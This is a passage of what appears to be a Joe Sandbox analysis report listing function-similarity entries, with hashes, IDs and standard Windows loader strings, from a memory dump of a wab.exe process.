                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: 27f6525a0297aaba30a45e4af3567d9343adb8bbaac0aef7fca4a77133367cb1
                                            • Instruction ID: ea1b059b09e63af4e8703a060d23e288d16fc4dd6db22548bd554d44d132ce7a
                                            • Opcode Fuzzy Hash: 27f6525a0297aaba30a45e4af3567d9343adb8bbaac0aef7fca4a77133367cb1
                                            • Instruction Fuzzy Hash: 06112C72F04605BFE7159E4DCC41F5B7AACDB94B54F1580E97A04DB248D674CF4087A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 7d14c9884b6b4ed76ecec1d9a7fe17084cfb5ae98203ace39eb4621bbf5092c8
                                            • Instruction ID: a77a6c1fcedb023500fb27bb9808978525a30718b39f592d05557b261b709426
                                            • Opcode Fuzzy Hash: 7d14c9884b6b4ed76ecec1d9a7fe17084cfb5ae98203ace39eb4621bbf5092c8
                                            • Instruction Fuzzy Hash: 85826975E0021A8FDB24DFA9CC80BADF7B5FF48750F1481AAD919AB295D730A981CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @[>#@[>#
                                            • API String ID: 0-3441647779
                                            • Opcode ID: 8561b6e0012d15576aaf1663ac9410220e3477f5a00c54390978906a985c6b3c
                                            • Instruction ID: 9c1a1f18afee6810671f2df0e92eed47974eb7af6ce17d4b0e5771bd095e6a75
                                            • Opcode Fuzzy Hash: 8561b6e0012d15576aaf1663ac9410220e3477f5a00c54390978906a985c6b3c
                                            • Instruction Fuzzy Hash: A832B375E00219DBCF18DFA8C880BEEBBB5FF58704F1841A9E845AB351D7359A61CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: f196b7708ec247cea982830919c994bd81f70fb9a234dd120d87cfdd23f62b41
                                            • Instruction ID: 7d4fb416d4abadf55bd0f4603417ede21488f023c5cd5a477ad5dde24fc53215
                                            • Opcode Fuzzy Hash: f196b7708ec247cea982830919c994bd81f70fb9a234dd120d87cfdd23f62b41
                                            • Instruction Fuzzy Hash: AD71AF71E00209DFDF18DF98D990A9DBBF5BF58350F1480AEE505A7249EB718A41CF68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                            • Instruction ID: 47a643be4adb9bb6c0f2f745aa5410d45a9fe7c332b95739eca9fd6ca76da502
                                            • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                            • Instruction Fuzzy Hash: BC6116B1D11359ABDB21DFA9CC40F9EFBB8BF84714F1441AAE910B7290D7749A41CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #%u
                                            • API String ID: 0-232158463
                                            • Opcode ID: 2e58fc43b8f7f5e60f3f8fd845d65b0d8fb1a34c09d6d84d0e5775e5c7a7bf1c
                                            • Instruction ID: be1df57ae3d71dfd5bde80ce9f21f6e2318f5aa98eb7c1009e286442db707523
                                            • Opcode Fuzzy Hash: 2e58fc43b8f7f5e60f3f8fd845d65b0d8fb1a34c09d6d84d0e5775e5c7a7bf1c
                                            • Instruction Fuzzy Hash: D1712871E002499FDB15DFA8C980FAEB7F8BF18714F1440A5E905E7255EA34EA41CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0h>#
                                            • API String ID: 0-1946801962
                                            • Opcode ID: 04ae829e8a1f8dd06d109222f581c17680cca29eebd7ac19d0b0c8d7acdd1818
                                            • Instruction ID: 347d7973f73310765ca9b2c594a18af37dc74c01fafe1c28601961a95930c4b0
                                            • Opcode Fuzzy Hash: 04ae829e8a1f8dd06d109222f581c17680cca29eebd7ac19d0b0c8d7acdd1818
                                            • Instruction Fuzzy Hash: D841D331B006A09BD715DB29CC91B6BB7BBEF90664F148299F919CFA80DB34DB01C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: 5f44987d2131f6bdd4c5afa29494006faeba7d90118c2650d9137d6327aab33b
                                            • Instruction ID: bc98d0b8e70dd018f4db792316daecbb7fcd622926bdbd10360d91e5a2369507
                                            • Opcode Fuzzy Hash: 5f44987d2131f6bdd4c5afa29494006faeba7d90118c2650d9137d6327aab33b
                                            • Instruction Fuzzy Hash: E141C072A29705ABD720DB65D840F5FB3ECAF88B04F040AAEF584E7180E674DB048796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                            • Instruction ID: 74dcbf89b5fff272739b771164711fd7f4a69654449533adc69cb011b91767ab
                                            • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                            • Instruction Fuzzy Hash: 5D517A71615710AFD320CF19C841A6BBBF8FF48710F01896AFA95976A0E7B4EA04CBD5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 3a5c158a26a29dc92585708a088a438601c59284951b084f8f975a29c9cd6396
                                            • Instruction ID: 12a997ec5c2f38032d020b34edff92dc2688ae92bcbb68a7c482679092b5457d
                                            • Opcode Fuzzy Hash: 3a5c158a26a29dc92585708a088a438601c59284951b084f8f975a29c9cd6396
                                            • Instruction Fuzzy Hash: E14150B1D0122CAFDB21DA50CC90F9EB77CAB44714F0045E5E609AB144DB709F888FA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .#
                                            • API String ID: 0-1025359690
                                            • Opcode ID: 526a7736d4ca1d31db9b3c0a4389f76409f9263a506273f7b68dc1da0684e3c9
                                            • Instruction ID: 43810a836b2a12ce99e116435674a649bcc2808b4869db6942d5152dffd84128
                                            • Opcode Fuzzy Hash: 526a7736d4ca1d31db9b3c0a4389f76409f9263a506273f7b68dc1da0684e3c9
                                            • Instruction Fuzzy Hash: 4641BEB1A107019FD324DF28D880A12F7F9FF68314B148AEDD556C7A51E730EA85CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Flst
                                            • API String ID: 0-2374792617
                                            • Opcode ID: 688346bd689dd5484d060fa1c9de52109bbffa290583f2fe7c1497fc2ddd0e65
                                            • Instruction ID: 4e28b69505c0bdacaf1189913a45098a1c890d21189d6f92eec6e1ab8895b20e
                                            • Opcode Fuzzy Hash: 688346bd689dd5484d060fa1c9de52109bbffa290583f2fe7c1497fc2ddd0e65
                                            • Instruction Fuzzy Hash: 0E41B7B16157029FC304DF18C480A06FFE8FB89724F1981AEE959CB285D771CE46CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 169a0fbbca6de4c8968947cc1b89a7f97e99d7f722381a7ae00d1c54852098f9
                                            • Instruction ID: 25b517aa326ecb0f7fbffc5488b11f76fc708a71f8899ef9848f72e9d0779851
                                            • Opcode Fuzzy Hash: 169a0fbbca6de4c8968947cc1b89a7f97e99d7f722381a7ae00d1c54852098f9
                                            • Instruction Fuzzy Hash: AB31E1B6901619AFDB15DB58C855E6FB7B8EB81B20F0181A9F911A7290D770DF00CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 233785DE
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: 087ebdf714cf813be8037b824f881f79cbd83421a363007e37b170e0a951fcc9
                                            • Instruction ID: 3aeb6f7a48de4798ce79b230a8475f9619947ead06d9fee252e41610f25b726d
                                            • Opcode Fuzzy Hash: 087ebdf714cf813be8037b824f881f79cbd83421a363007e37b170e0a951fcc9
                                            • Instruction Fuzzy Hash: 8D01F236A0031CAFD7356E118C89E6A7B79EF54250F0800E8E7024E452CB2CAB80CA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd7ad684f0a89a556cdcf9db5aa231ffb39085bd89754c7726234321a515ab83
                                            • Instruction ID: 0b9cd636e0b25256669484d8af41f5253d1c0a94d33bcbc0047cf771daa56a43
                                            • Opcode Fuzzy Hash: cd7ad684f0a89a556cdcf9db5aa231ffb39085bd89754c7726234321a515ab83
                                            • Instruction Fuzzy Hash: 6342A571E006158FDB18DF59C8909AEB7F6FF88314B18859DE662AB341D734EE42CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c973f6a99d199c669d9624c7f6943cfabc0420f40eee9c685cc4cdb91cf26685
                                            • Instruction ID: 7cc62266b56296c0bd0b96704fca8a8905c429df2b03e8a6052aa0454efc9582
                                            • Opcode Fuzzy Hash: c973f6a99d199c669d9624c7f6943cfabc0420f40eee9c685cc4cdb91cf26685
                                            • Instruction Fuzzy Hash: A432EF74A007588FDB24DF69C850FAEBBFABF88700F24419DE4469B685D735AB42CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 384ffcfb8ef0c81f67ec7b4788378205564bde32731558207c6ca0fa962fc344
                                            • Instruction ID: 8b46a7fc1da471278440677e58bf15f0a253a1e0609a457fb7bc9c8c94cd0b2f
                                            • Opcode Fuzzy Hash: 384ffcfb8ef0c81f67ec7b4788378205564bde32731558207c6ca0fa962fc344
                                            • Instruction Fuzzy Hash: ECD10675A0031A9BCB14CF25CC91EAA73F5FF54B04F8841A9E999DB280EB70FA81C750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8d2c2425e4b73e9d30f9945e9ce289da6b2aa835952e314e00e12a04818f5c9
                                            • Instruction ID: 79fc3d25331bef8fda9108c38322bb3d6c31ff905a2551049388b353e31e299e
                                            • Opcode Fuzzy Hash: a8d2c2425e4b73e9d30f9945e9ce289da6b2aa835952e314e00e12a04818f5c9
                                            • Instruction Fuzzy Hash: CEC1C371E002169BDB14DF58CC40FAEF7B5EF48724F1882A9E914EB295D770EA81CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0b26c73e67042dc8c7a5f6381d6df2ac4c64e319808921341452edce62ec168
                                            • Instruction ID: 51a72662bb73948f012340345fcd6ef93addeaed488f3e376692f236a11fdbd3
                                            • Opcode Fuzzy Hash: b0b26c73e67042dc8c7a5f6381d6df2ac4c64e319808921341452edce62ec168
                                            • Instruction Fuzzy Hash: 98D1E3B19012049FDB55DF68C980B9A7BF9BF09340F0485BAED09DF21AD731DA05CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47073b9eab70b96ec1851cfb8e77e7e7742019ab5ac9ac3b27653dab9d3be703
                                            • Instruction ID: f820f89b2330b17aba229311fe8286bd25399e692680299c5aba180886219c6e
                                            • Opcode Fuzzy Hash: 47073b9eab70b96ec1851cfb8e77e7e7742019ab5ac9ac3b27653dab9d3be703
                                            • Instruction Fuzzy Hash: 3EC1DF71A053258BCB14DF58C890B69B7F9FF48704F1A41D9EA42DB296E734CB81C7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 40ec4f7ab727ce6ef2923c5b5974f8f066573875d1dc0462fb6df7f918a44a14
                                            • Instruction ID: d9dc8c11b9fa61a69820f36dc514dbebf33e4fc5e5c67cdcb320f761b1e28539
                                            • Opcode Fuzzy Hash: 40ec4f7ab727ce6ef2923c5b5974f8f066573875d1dc0462fb6df7f918a44a14
                                            • Instruction Fuzzy Hash: B3C136B1D007059FCB25DF98C950A9EBBF8FF48710F1444AAE61AEB351D738AA41CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37e3147e6c76d2eb46b52cb85f2c8a09c3d755400c2e8c494164831812f27f32
                                            • Instruction ID: 16d73c4b5cea46301a46dc82e1304ef882b2dacc4b041ad38457fdaf989972e3
                                            • Opcode Fuzzy Hash: 37e3147e6c76d2eb46b52cb85f2c8a09c3d755400c2e8c494164831812f27f32
                                            • Instruction Fuzzy Hash: DEC167746083818FD760DF14C890BABF7E4BF88304F5449ADE99987291E774EA49CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4e55fbd919de679abe36064556d4a4bb8cf413722e6eab2ddeea60fee30c15e
                                            • Instruction ID: edd1473f62c2f2ea81e73ae30ca7ca565ed1d4b24c2a8b8902371fb582b28a95
                                            • Opcode Fuzzy Hash: d4e55fbd919de679abe36064556d4a4bb8cf413722e6eab2ddeea60fee30c15e
                                            • Instruction Fuzzy Hash: 0CB18E70A002658BDB35DF64CC91BA9B3F5EF44700F4485EAD50EAB251EB70AEC5CB25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12c5a29212fd189cf32ba259a34cbab6bbfd8f0943dc875cafbbddacf52326ca
                                            • Instruction ID: 11a00db12a2bda886ac6fe0290cb965a328d8101552767eeada8a02e8e08e481
                                            • Opcode Fuzzy Hash: 12c5a29212fd189cf32ba259a34cbab6bbfd8f0943dc875cafbbddacf52326ca
                                            • Instruction Fuzzy Hash: 61A1E131E01714EBDB25DBA4C844F9E77E8EF08B54F0901D5EA51EB291D7B8DB108B85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6253e9257f9580ce2e78951f1c1814ceb1ff3f0be75112d6c0edde30b3418d7
                                            • Instruction ID: f2a42cbeae3f06c33b971080818e640e525b4c977bc2e91a5bef81fc9d78d024
                                            • Opcode Fuzzy Hash: a6253e9257f9580ce2e78951f1c1814ceb1ff3f0be75112d6c0edde30b3418d7
                                            • Instruction Fuzzy Hash: 6EA1D074F017159FDB28DF65C980BAAB7B9FF45324F0480A9EA06D7281DB34AB41CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d0bf4bff6d28942d937953ccacb303962b7e745007065f7a53dbeda2d79e4ac
                                            • Instruction ID: 40806ef2e18a6ce7b8f8e91969265da9ef0c7b76989d8e5832b3a99b333045ff
                                            • Opcode Fuzzy Hash: 6d0bf4bff6d28942d937953ccacb303962b7e745007065f7a53dbeda2d79e4ac
                                            • Instruction Fuzzy Hash: 69A1CB72A14741EFC322EF24C980B5AB7E9FF98724F4409A8E585DB651C334EE51CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc4dc65439bd5ed7200057e055a9cdf582df6832ed6a2eb1e643770d1b279e1b
                                            • Instruction ID: d9b5e6c1946ea65fd56f61e2ed26a2cbe1538814266a75d9e073faf4f48ccb0e
                                            • Opcode Fuzzy Hash: fc4dc65439bd5ed7200057e055a9cdf582df6832ed6a2eb1e643770d1b279e1b
                                            • Instruction Fuzzy Hash: 3691F132B11A248BD714AB68C880F6EB7F5EF98B10F0940EAF915DB381D7349B41CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
